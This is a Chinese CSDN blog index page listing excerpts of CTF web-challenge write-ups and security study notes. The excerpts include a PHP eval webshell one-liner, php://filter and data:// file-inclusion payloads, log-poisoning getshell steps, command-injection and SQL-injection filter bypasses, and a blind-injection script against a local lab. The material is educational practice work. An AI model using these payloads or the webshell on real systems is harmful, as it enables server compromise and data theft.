自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

L1ni01

希君生羽翼,一化北溟鱼

  • 博客(84)
  • 收藏
  • 关注

转载 波特、码元与比特的关系

波特就是单位时间传送的码元个数,但是什么是码元呢?书上这么说:一个数字脉冲就是一个码元。通俗的理解,我们知道电路传输信号是靠波形的变化来识别每一位(英文单位bit)信息的,那么这一位信息的波形就叫作码元。举个例子: 当用二进制码0和1表示数据时,代表0的波形是一个码元,代表1的波形又是一个码元,当然这两个码元的形状是不相同的,这样接收方就可以根据不同的波形识别出发送的信息了。比特是英文的bit音译过来的,是信息的度量单位。bit的意思是位,即一位信息,当用二进制0和1表示数据时,0是一位,1也是一位,就

2021-03-16 19:57:30 1734

转载 python正则学习笔记

https://blog.csdn.net/wayway0554/article/details/79892344https://y4tacker.blog.csdn.net/article/details/106964316Y4 yyds

2020-12-12 22:57:02 207

原创 [ctfshow]web入门php特性89-115

web89if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }}num的值不能有数字,但又必须是数字。在intval中数组也有正确的返回值,数组可以返回false绕过正则payload:num[]web90、92、

2020-12-12 21:33:39 1159

原创 zip和phar文件包含

zip和phar文件包含phar文件包含phar协议要求:php大于5.3.0需要将php.ini的参数phar.readonly设置为off这个方法适用于验证包含文件为特定后缀时。使用Phar://伪协议流可以Bypass一些上传的waf,大多数情况下和文件包含一起使用,就类似于我们的压缩包(其实就是一个压缩包),只不过我们换了一种方式去执行而已本地测试:test.php<?php @eval($_POST["cmd"]);?>然后将test.php压缩,将压缩文件改后缀为

2020-12-06 16:03:08 1960

原创 php5和php7中eval和assert

evalphp官方手册:(PHP 4, PHP 5, PHP 7)eval — 把字符串作为PHP代码执行该函数只有一个参数,即需要被执行的字符串代码。代码不能包含打开/关闭PHP标签,但可以用合适的 PHP tag 来离开、重新进入 PHP 模式。我们下面进行测试<?phpeval(' echo "Hi!"; ');echo "\n";//eval('echo `whoami`;');eval('<?php echo "Hi!";?>');echo "\n";e

2020-12-04 18:33:35 2038 1

原创 [ctfshow]web入门文件包含78-88

web 78payload:?file=php://filter/read=convert.base64-encode/resource=flag.phpweb 79payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=web 80-81试了试文件日志包含漏洞先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log访问发现成功进行getshel

2020-12-04 10:00:29 2399 2

原创 CVE-2018-12613[远程文件包含漏洞]复现

CVE-2018-12613[远程文件包含漏洞]复现0x00漏洞介绍攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外:$ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码;$ cfg [‘ServerDefault’] = 0:这会绕过登录并

2020-12-01 18:49:01 2470 1

原创 DMCTF2020(web部分wp)

2020带妹ctf杯,哪里有妹妹???这个新生比赛打了一周,着实很累。战果:Score:4000Rank:4webweak_type弱类型构造get传参 num=202020020aaa&v1=240610708&v2=QNKCDZOpost传参 message={"key":0}thinkphp刚开始一看感觉好难。。。后面百度了一下thinkphp5发现了一篇文章 https://blog.csdn.net/weixin_45949219/article/det

2020-11-29 20:09:19 740

原创 ping命令执行及bypass

ping命令执行及bypass管道符windows 下|直接执行后面的语句||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句&前面和后面命令都要执行,无论前面真假&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令Linux 下;前面和后面命令都要执行,无论前面真假|直接执行后面的语句||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句&前面和后面命令都要执行,无论前面真假&&如果前面为假,后

2020-11-27 01:07:18 986

原创 php反序列化之pop链

php反序列化之pop链POP链介绍POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的说的再具体一点就是 ROP 是通过栈溢出实现控制指令的执行流程,而我们的反序列化是通过控制对象的属性从而实现控制程序的执行流程,进而达成利用本身无害

2020-11-20 22:31:48 5211

原创 [ctfshow-web-9]

[ctfshow-web-9]这题考验MD5加密后的SQL 注入题解:在robots.txt 发现提示信息。打开有源码<?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("password error"); } $sql="select * from user where username ='admin' and password ='".md5

2020-11-17 12:26:22 262

原创 文件日志包含漏洞

文件日志包含漏洞日志包含漏洞原因:某php文件存在本地文件包含漏洞,但无法上传文件,利用包含漏洞包含Apache(看服务器是Apache还是nginx)日志文件也可以获取WebShell我们接下来用的服务器是Apache注意:需要开启apache记录日志功能访问日志的位置和文件名在不同的系统上会有所差异apache一般是/var/log/apache/access.log。:nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log

2020-11-16 21:48:00 3246

原创 sqlmap之tamper脚本

sqlmap之tamper脚本进行注入时,往往会遇到服务端主机装有 WAF(Web Application Firewall)对 Payload 进行过滤的情况,这使得注入攻击无法成功实施。但 WAF 往往是通过规则对攻击的 Payload 进行检测然后过滤,只要我们能绕过 WAF 的检测规则就能完成攻击。那么绕过的方法一般有哪些呢?我们可以透过 SQLMAP 中的绕过技术学习一二。SQLMAP 中有一个 Tamper 模块专为绕过 WAF 制定特殊的 Payload,–-tamper选项可以使用加载模

2020-11-14 21:10:58 3222

原创 [ctfshow web7-8]

web7我一直在想,如果关键字被过滤了,怎么去判读字段长度?其实盲注的话,貌似就没有这个麻烦了做题之前先判断哪些关键字被过滤了,index.php?id=1'or1=1#index.php?id=1'or 1=1#一碰到空格就报错,空格被过滤用 /**/绕过1.爆库名(web7)当输入为id=-1/**/or/**/ascii(substr(database(),1,1))=119时出现文章内容,证明库名的第一个字符为‘w’,以此类推。2.爆表名(flag,page,user)id=-

2020-11-14 12:56:22 443 6

原创 sql注入常见绕过

sql注入常见绕过一、绕过空格(注释符/* */,%a0)1.两个空格代替一个空格(双写)2.%a0=空格3.最基本的绕过方法,用注释替换空格:/*注释/*4.括号绕过空格如果空格被过滤,括号没有被过滤,可以用括号绕过。在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。例如:time based盲注:?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109

2020-11-13 18:24:53 1688

原创 SQL注入脚本编写

SQL注入脚本编写穷举1.bool盲注脚本(post型)import requestsurl = "http://127.0.0.1/sqli-labs-master/Less-15/"result =""for i in range(1,10): for j in range(65,150): payload1 = "0'^(ascii(substr(database(),{},1))>{})^1#".format(i,j) payload2 = "admin'^(ascii(

2020-11-13 17:57:48 2104

原创 xxe漏洞学习

xxe漏洞学习一.XML基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。DTD元素DTD属性以下是 属性类型的选项:我们XXE 利用的是 它的实体属性DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。内部声明DTD<!DOCTYPE 根元素 [元素声明]&gt

2020-11-06 19:43:13 186

原创 bugku字符正则

直接看题<?php highlight_file('2.php');$key='KEY{********************************}';$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);if( $IM ){ die('key is: '.$key);}?>再次学习一下 pre_matchpre_match函数

2020-11-01 21:19:06 277

原创 无字母数字rce(ctfshow web入门56)

无字母数字rce(ctfshow web入门56)我们根据这一题直接进入主题//web56<?php// 你们在炫技吗?if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); }}else{ highlight_file(__FILE__);}过滤

2020-11-01 20:07:47 3506

原创 bugku流量分析(1-5)

这是我的第一次接触流量分析题1.flag被盗ctrl + f 搜flag ,随便点击一个进行tcp数据流追踪在其中看到了 flag:2.中国菜刀过滤出http,只有6条数据记录,3条post,3条response。对其中一条进行 TCP追踪会发现直接binwalk分离即可获得flag既然是一个文件中包含另一个文件,那就试一试binwalk提取并解压,即可得到flag3.这么多数据包下载完安装包,还是没有头绪打开wireshark,http过滤后,发现什么也没有题目提示 先找到g

2020-10-29 08:40:51 454 1

原创 php无参数函数利用

php无参数函数利用1.我们先看一道题目无参数的意思可以是a()、a(b())或a(b(c())),但不能是a(‘b’)或a(‘b’,‘c’),不能带参数由 题目中的正则我们可以发现,我们无法写参数进去,只能用 a(b(c())) 这种方式进行rce,这题过滤的是中文 的 ()所以不要多想。(出题人的小技巧,哈哈)介绍无参数函数绕过所需要利用的函数方法1:getenv()查阅php手册,有非常多的超全局变量$GLOBALS$_SERVER$_GET$_POST$_FILES$_

2020-10-24 15:02:06 1854

原创 CTF中常见的黑魔法

CTF中常见的黑魔法入门级别 不是很全,慢慢总结1.sha1和md5要求变量原值不同但md5或sha1相同的情况下1.0e开头的全部相等(==判断)240610708 和 QNKCDZO md5值类型相似,但并不相同,在”==”相等操作符的运算下,结果返回了true.Md5和sha1一样2.利用数组绕过(===判断)Md5和sha1对一个数组进行加密将返回NULL;而NULL===NULL返回true,所以可绕过判断。2.strcmp函数的绕过strcmp 的参数只能是字符串,当我们传入

2020-10-20 19:26:13 2305

原创 ctfshow web入门命令执行部分(更新至56)

ctfshow web 入门 命令执行部分web29源码<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}payload:c=system('cat f*');匹配任何字符串/文本,包括空字符串;

2020-10-16 11:10:06 3110

原创 php反序列化学习及简单的反序列化漏洞介绍

php反序列化学习经历1.为什么会有序列化和反序列化我们在开发的过程中常常遇到需要把对象或者数组进行序列号存储,反序列化输出的情况。特别是当需要把数组存储到mysql数据库中时,我们时常需要将数组进行序列号操作。序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。2.相关函数serialize是序列化函数先看看数组的序列化<?php$x

2020-10-13 13:40:26 457

原创 php伪随机数漏洞利用

php伪随机数相关函数mt_rand()mt_rand函数有两个可选参数 min 和 max,如果没有提供可选参数,mt_rand函数将返回返回 0 到 mt_getrandmax() 之间的伪随机数。例如想要 5 到 15(包括 5 和 15)之间的随机数,用 mt_rand(5, 15)。mt_srand()用于播下一个更好的随机数发生器种子,用 seed 来给随机数发生器播种。 没有设定 seed 参数时,会被设为随时数。自 PHP 4.2.0 起,不再需要用 srand() 或 mt_sr

2020-10-10 17:55:34 806

转载 dirsearch下载与简单实用

https://www.cnblogs.com/a16n/p/12853346.html

2020-10-04 16:37:47 826

原创 PHP常用伪协议

一.(file://协议)PHP.ini:file:// 协议在双off的情况下也可以正常使用;allow_url_fopen :off/onallow_url_include:off/onfile:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响file:// [文件的绝对路径和文件名]例如http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WW

2020-09-17 19:44:51 229

原创 ctfhub 综合过滤

题目考点命令注入过滤运算符、过滤目录分隔符、过滤反斜杠、过滤空格、过滤封号、过滤cat、过滤关键字flag和ctfhub首先我们要使用ls列目录,发现这里过滤了运算符,绕过的方式有%0a、%0d、%0D%0A,经测试这里可以使用%0a127.0.0.1%0als空格及关键词过滤绕过我们使用ls flag_is_here列出子目录的文件,免不了绕过空格和flag的顾虑,绕过空格前面已经有writeup中附带了相关技巧,我们这里使用${IFS}绕过 绕过flag关键字,我们使用的方法也是多种多样,

2020-09-15 21:51:53 1226

原创 ctfhub 00截断

这个00截断和我之前遇到的不太一样 之前是在文件后缀加上00截断我们先看看源代码if (!empty($_POST['submit'])) { $name = basename($_FILES['file']['name']); $info = pathinfo($name); $ext = $info['extension']; $whitelist = array("jpg", "png", "gif"); if (in_array($ext, $whitel

2020-09-04 23:29:19 1346

原创 ctfhub 默认口令

设备 默认账号 默认密码深信服产品 sangfor sangforsangfor@2018sangfor@2019深信服科技 AD dlanrecover深信服负载均衡 AD 3.6 admin admin深信服WAC ( WNS V2.6) admin admin深信服VPN Admin Admin深信服ipsec-VPN (SSL 5.5) Admin Admin深信服AC6.0 admin adminSANGFOR防火墙 admin sangfor深信服AF(NGAF .

2020-08-28 10:32:01 2616

转载 路径穿越攻击

https://www.cnblogs.com/AtesetEnginner/p/11064279.html

2020-08-24 13:47:20 3559

原创 hetianlab_check your source code

这是一道代码审计题打开靶机输入地址查看源代码提示有source.txtd 打开发现源码<?php$flag = "XXXXXXXXXXXXXXXX";$secret = "xx";if(!isset($_POST["username"]) || !isset($_POST["password"])){ exit();}$username = $_POST["username"];$password = $_POST["password"]; if (!empty($

2020-08-18 13:58:20 204

原创 xctf misc 之 SimpleRAR

附件下载完打开是没什么用用winhex 打开发现 secret.png 隐藏起来了这里涉及到双图隐写看一下这个博客 https://blog.csdn.net/weixin_40729735/article/details/102850998txt文件结束之后就是png文件的开始了,7A改成74 才是文件头,这里涉及到RAR文件的结构:改完之后重新解压 发现多了一个 png 图像 再用winhex打开 发现有gif 的提示把这个图片后缀改为gif 打开也是一片空白突然想起来.

2020-08-13 12:39:33 557

原创 xctf misc之stegano

下载附件发现一个pdf全部复制 放到百度翻译 发现是拉丁文 然而翻译的结果并没有什么用处复制的时候会发现多了 ABAB等等的 字符串注意 (这边 复制需要都复制到不只是复制有拉丁文的地方 因为打开pdf 的时候你会发现有些没有拉丁文的地方也能复制 这边建议用火狐打开 pdf 比较好复制)BABA BBB…等等我们联想到 摩斯密码将“A”替换为“.","B"替换为“-”,摩斯解密得到flagflag{1nv151bl3m3554g3}...

2020-08-12 16:48:39 308

原创 xctf misc之如来十三掌

附加下载完 是这个肯定是密文百度如来十三掌 这个网站好像能解密需要注意的是 要加上 " 佛曰 :"网址:http://www.keyfc.net/bbs/tools/tudoucode.aspx然后这串密文 我也卡住了 看看其他大佬的wp 是rot13解密我这种菜鸡怎么会知道这种密文呢 哈哈继续解密解出来的这个 是base64 继续解码得到 flag{bdscjhbkzmnfrdhbvckijndskvbkjdsab}...

2020-08-12 14:26:41 164

原创 xctf MISC之掀桌子

题目给了一串字符串,发现由a-z的字母和数字组合而成,两个16进制数代表一字节,两个两个分成一组转化,但是由于ASCII码最大是到128,所以得出的结果减128再转成字符串就得到flag。用python脚本来实现:m = "c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eafae3f9e4eafae2eae4e3eaebfaebe3f5e7e9f3e4e3e8eaf9eaf3e2e4e6f2"num=""for i in range.

2020-08-12 14:14:13 976

原创 xctf web之 simple_js

输入密码后查看源码<html><head> <title>JS</title> <script type="text/javascript"> function dechiffre(pass_enc){ var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65"; var tab = pass_enc.split

2020-08-09 15:46:00 136

原创 xctf web之 simple_php

打开题目发现源码<?phpshow_source(__FILE__);include("config.php");$a=@$_GET['a'];$b=@$_GET['b'];if($a==0 and $a){ echo $flag1;}if(is_numeric($b)){ exit();}if($b>1234){ echo $flag2;}?>看看关键条件第一个是变量 a==0 并且 a存在的时候会输出flag的前半部分第二个是当

2020-08-08 15:40:36 216

原创 xctf web之 command_execution

打开题目源代码也没东西题目为 命令执行 并且题目提示没 waf 肯定就用到命令执行漏洞先介绍一下 命令执行漏洞:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。常见连接符;A;B 先执行A,再执行B& A&B 简单拼接,A B之间无制约关系| A|B 显示B的执行结果&&amp

2020-08-06 21:19:03 224

转载 Bugku ---- web--- welcome to bugkuctf

https://blog.csdn.net/qq_43271194/article/details/89809969?utm_medium=distribute.pc_relevant.none-task-blog-baidulandingword-8&spm=1001.2101.3001.4242

2020-08-05 12:36:49 178

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除